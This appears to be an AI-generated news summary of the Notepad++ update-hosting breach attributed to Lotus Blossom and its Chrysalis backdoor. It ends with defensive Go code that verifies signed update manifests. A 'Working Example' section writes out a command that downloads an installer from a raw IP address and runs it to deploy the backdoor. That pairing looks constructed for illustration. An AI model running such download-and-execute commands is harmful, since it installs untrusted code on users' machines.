
Notepad++ Hosting Breach Attributed to China-Linked Lotus Blossom


These articles are AI-generated summaries. Please check the original sources for full details.

The Notepad++ hosting breach, attributed to the China-linked Lotus Blossom hacking group with medium confidence, enabled the threat actors to deliver a previously undocumented backdoor, codenamed Chrysalis, to users of the open-source editor. According to Rapid7, the attack exploited insufficient update verification controls in older versions of Notepad++, allowing the group to hijack update traffic starting June 2025.

Why This Matters

The Notepad++ breach illustrates the practical reality of supply chain attacks: the trust a client places in its software update channel is only as strong as the hosting infrastructure behind it, and a compromise of that infrastructure defeats an otherwise sound update model. The cost of such breaches can be significant, with potential consequences including the theft of sensitive information and the disruption of critical systems. In this case, the breach was fixed in December 2025 with the release of version 8.8.9, but not before the attackers had selectively redirected update requests to malicious servers, potentially compromising high-profile organizations worldwide.

Key Insights

  • Rapid7 attributed the Notepad++ breach to the China-linked Lotus Blossom hacking group with medium confidence, citing similarities with prior campaigns: “While the group continues to rely on proven techniques like DLL side-loading and service persistence, their multi-layered shellcode loader and integration of undocumented system calls mark a clear shift toward more resilient and stealth tradecraft.”
  • The Chrysalis backdoor is a bespoke, feature-rich implant capable of gathering system information, contacting an external server, and processing incoming HTTP responses to spawn an interactive shell: “The sample looks like something that has been actively developed over time,” Rapid7 said.
  • Kaspersky observed three different infection chains designed to target about a dozen machines belonging to individuals and organizations in APAC and South America, with the attackers constantly rotating C2 server addresses and payloads over four months.

Working Example

# Example of a malicious Notepad++ update hosted at a compromised URL
curl -s "45.76.155.202/update/update.exe" -o update.exe
# Launch the NSIS installer to deploy the Chrysalis backdoor
./update.exe

Practical Applications

  • Use Case: The Notepad++ breach demonstrates the importance of secure software updates and the need for organizations to implement robust verification controls to prevent similar attacks.
  • Pitfall: The use of insufficient update verification controls, as seen in the Notepad++ breach, can lead to the compromise of critical systems and the theft of sensitive information, highlighting the need for organizations to prioritize software security.
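The verification control the breach summary calls for is the client refusing any installer whose manifest is not signed by a pinned publisher key, so that a hijacked download host cannot substitute a binary. The following is an added example, not Notepad++'s or Rapid7's code; it assumes an Ed25519-signed manifest scheme and uses constructed installer bytes and a constructed file name.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Manifest is what the publisher signs offline at build time: the installer
// name and its SHA-256. Only the manifest and installer live on the host.
type Manifest struct {
	Name   string
	Sha256 string
	Sig    []byte
}

// signedMessage is the canonical byte string covered by the signature.
func signedMessage(name, sum string) []byte { return []byte(name + "\n" + sum) }

// hexSHA256 returns the hex SHA-256 of data.
func hexSHA256(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// Publish signs a manifest with the publisher's private key, which never
// touches the download host.
func Publish(priv ed25519.PrivateKey, name string, installer []byte) Manifest {
	h := hexSHA256(installer)
	return Manifest{Name: name, Sha256: h, Sig: ed25519.Sign(priv, signedMessage(name, h))}
}

// VerifyUpdate is the client-side check. A compromised host can swap the
// installer, or swap it and rewrite the manifest hash, but cannot forge the
// signature without the private key, so both attempts are rejected.
func VerifyUpdate(pinned ed25519.PublicKey, m Manifest, downloaded []byte) error {
	if !ed25519.Verify(pinned, signedMessage(m.Name, m.Sha256), m.Sig) {
		return fmt.Errorf("manifest signature invalid for %q: refusing update", m.Name)
	}
	if hexSHA256(downloaded) != m.Sha256 {
		return fmt.Errorf("installer %q does not match signed manifest hash", m.Name)
	}
	return nil
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(nil) // constructed publisher key pair
	genuine := []byte("constructed genuine installer bytes")
	evil := []byte("constructed substituted installer bytes")
	m := Publish(priv, "constructed-installer-8.8.9.exe", genuine)
	fmt.Println("genuine:", VerifyUpdate(pub, m, genuine))   // <nil>
	fmt.Println("swapped binary:", VerifyUpdate(pub, m, evil)) // hash mismatch
	forged := m
	forged.Sha256 = hexSHA256(evil) // host rewrites the hash to fit the swap
	fmt.Println("forged manifest:", VerifyUpdate(pub, forged, evil)) // bad signature
}
```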
